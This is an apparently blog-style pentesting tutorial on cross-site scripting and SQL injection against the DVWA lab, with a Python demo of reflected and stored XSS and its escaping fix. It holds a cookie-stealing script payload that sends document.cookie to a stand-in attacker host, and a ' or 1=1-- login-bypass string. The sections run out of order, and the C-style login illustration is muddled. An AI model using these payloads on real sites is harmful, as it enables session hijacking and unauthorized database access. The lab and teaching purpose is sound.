Cross Site Scripting - II




Persistent XSS Attack

In a persistent attack the code injected by the attacker is stored on the server side, usually in a database, and is served to every user who later views the affected page. The damage caused by a persistent attack is therefore greater than that of a non-persistent one. Here we will see how an attacker can hijack another user's session by performing XSS.

Session

HTTP is a stateless protocol: it maintains no state between one request/response pair and the next, and every request is independent of every other. Most web applications cannot work that way. Once a user has authenticated, the web server should not ask for the username and password again on the next request. To achieve this, the web browser and web server must maintain some state between them, which is done through "sessions": the server issues a session identifier, normally in a cookie, and the browser sends it back with every request. To the server, whoever presents that identifier is that user, which is why injected script that can read a victim's cookies can take over the victim's session.

Cross Site Scripting - I








What is Cross Site Scripting ?

Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications. It enables attackers to inject client-side script into web pages viewed by other users, so that the script runs in the victim's browser with the privileges of the vulnerable site. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.

Types of Cross Site Scripting

XSS attacks are broadly classified into three types:

•    Non-persistent (reflected attack)
•    Persistent (stored attack)
•    DOM-based XSS

Non-Persistent XSS Attack


A non-persistent attack requires the user to visit a link specially crafted by the attacker. When the user visits the link, the crafted code is reflected by the server into its response and executed by the user's browser; nothing is stored on the server. Let us understand this attack better with an example.

Example for Non-Persistent XSS



When the victim loads the above URL in the browser, an alert box appears. Even though this example does no damage beyond the annoying pop-up, it shows how an attacker could use the same method to do far more damaging things.

Performing a reflected XSS attack against DVWA on localhost




Enter any name, submit, and check the website's response.
 




For example, I used my name, Noah Franklin; see the response of the website, which says "Hello Noah Franklin".






The alert() method displays an alert box with a specified message and an OK button; use the script shown below.
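The following is an added example, not DVWA's code or the post's own script, written in Python in place of DVWA's PHP. It covers both the reflected greeting page above and the session-hijack scenario of part II: the name is read from the query string and concatenated into HTML (reflected), a constructed cookie-stealing payload is stored in a stand-in for the database table and rendered for every visitor (persistent), and each page is rendered again with HTML entity encoding to show the payload rendered as text rather than executed. The attacker host, the `Guestbook` class, the `PHPSESSID` cookie name and the helper names are assumptions for the example.

```python
import html
from urllib.parse import parse_qs, urlparse

# Constructed payload (the attacker host is invented): what a stored-XSS session
# hijack looks like once it lands in a page that other logged-in users view.
COOKIE_THEFT_PAYLOAD = (
    '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'
)


def name_from_url(url: str) -> str:
    """Read the `name` query parameter the way DVWA's reflected XSS page does."""
    query = parse_qs(urlparse(url).query)
    return query.get("name", [""])[0]


def render_greeting_vulnerable(name: str) -> str:
    """Reflected XSS: the parameter is concatenated straight into the HTML."""
    return f"<pre>Hello {name}</pre>"


def render_greeting_safe(name: str) -> str:
    """Same page with HTML entity encoding; the payload is displayed, not run."""
    return f"<pre>Hello {html.escape(name, quote=True)}</pre>"


class Guestbook:
    """Stands in for the database table in which persistent XSS is stored (assumed name)."""

    def __init__(self) -> None:
        self.comments: list[str] = []

    def post(self, text: str) -> None:
        self.comments.append(text)

    def render_vulnerable(self) -> str:
        # Every visitor's browser executes whatever the attacker stored.
        return "\n".join(f'<div class="comment">{c}</div>' for c in self.comments)

    def render_safe(self) -> str:
        return "\n".join(
            f'<div class="comment">{html.escape(c, quote=True)}</div>' for c in self.comments
        )


def contains_script_tag(document: str) -> bool:
    """Crude check used only to show whether a script element survived into the output."""
    return "<script" in document.lower()


def stored_xss_demo(payload: str = COOKIE_THEFT_PAYLOAD) -> tuple[bool, bool]:
    """Store the payload once, render the page both ways, report whether each would run it."""
    book = Guestbook()
    book.post("first post, harmless")
    book.post(payload)
    return contains_script_tag(book.render_vulnerable()), contains_script_tag(book.render_safe())


def session_cookie_header(session_id: str, http_only: bool = True) -> str:
    """Set-Cookie value for the session id (PHPSESSID assumed). HttpOnly keeps
    document.cookie from exposing it, so the payload above gets no session id even if it runs."""
    flags = ["Path=/", "Secure", "SameSite=Lax"]
    if http_only:
        flags.append("HttpOnly")
    return f"PHPSESSID={session_id}; " + "; ".join(flags)


if __name__ == "__main__":
    url = "http://localhost/dvwa/vulnerabilities/xss_r/?name=Noah%20Franklin"
    print(render_greeting_safe(name_from_url(url)))
    runs_vulnerable, runs_safe = stored_xss_demo()
    print("vulnerable page runs stored script:", runs_vulnerable)
    print("encoded page runs stored script:   ", runs_safe)
    print(session_cookie_header("0123456789abcdef"))
```

Output encoding is the fix for both variants because the flaw is the same in each: untrusted text reaching the HTML parser unchanged. The HttpOnly flag does not remove the XSS, it only denies injected script the session cookie, so it belongs alongside encoding rather than instead of it.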
 



SQL Injection - II




Install VMware and DVWA; the setup steps are at http://noahfranklin.blogspot.in/2015/06/how-to-setup-web-application-pentesting.html

Open DVWA, select the SQL Injection tab, and perform a SQL injection attack to collect the users' information.

Enter 1 and submit, then look at the response the database returns to the browser: it shows that ID 1 belongs to the admin account.


SQL Injection - I






SQL injection vulnerabilities and attacks occur between the presentation tier and the CGI tier. Most such vulnerabilities are introduced accidentally during development. The data flow through each tier for normal and for malicious input is shown in Figure 2, which depicts the user authentication step. When a user enters an ID and password to authenticate, the presentation tier sends the data to the CGI tier with the GET or POST method. The SQL query within the CGI tier connects to the database and processes the data.



When a malicious user enters an ID such as 1' or 1=1-- , the query within the CGI tier becomes

    SELECT * FROM user WHERE id='1' or 1=1-- ' AND password='1111';

Everything after the -- is a comment, so the password check disappears, and because or 1=1 is always true the authentication step is bypassed. SQL injection attacks are malicious data that change the normal SQL query into a malicious one and allow anomalous database access and processing. Most web applications use data filters to prevent this kind of SQL injection attack; however, there are many injection techniques that bypass such filters, which makes it difficult to defend the database effectively. Therefore a more effective way of detecting and preventing SQL injection attacks is necessary.


 Types of SQL Injection

  • Direct SQL Injection
    Ex: true conditions (tautologies) such as  ' or 1=1 --

  • Indirect SQL Injection
    Ex: query-based injection, blind injection, string-based injection, character-based injection, error-based SQLi, error-based double-query injection, XML injection



Direct SQL Injection Understanding

if (username == "franky" && password == "12345")
    printf("Welcome to Email");
else
    printf("Invalid Username or password");

Explanation:
The code above means that only when both the username and the password match the values held in the database is access to the email granted and "Welcome to Email" printed; otherwise the error message "Invalid Username or password" is shown.


Some Modification in Code

if (username == "a' or 1=1--" && password == "a' or 1=1--")
    printf("Welcome to Email");
else
    printf("Invalid Username or password");

Pure dynamic SQL is the most common source of SQL injection: the input value is concatenated straight into the statement text, for example

    sqlString = "SELECT ... FROM [myTable] WHERE name = '" . myInputValue . "'";



Explanation:
Here the comparison stands in for the WHERE clause the application builds from its input. With a' or 1=1-- as the username (and password), that clause becomes name = 'a' or 1=1 with the rest of the statement commented out; since 1=1 is always true the condition holds for every row, so the same login code still logs in and prints the welcome message even though no valid credentials were supplied.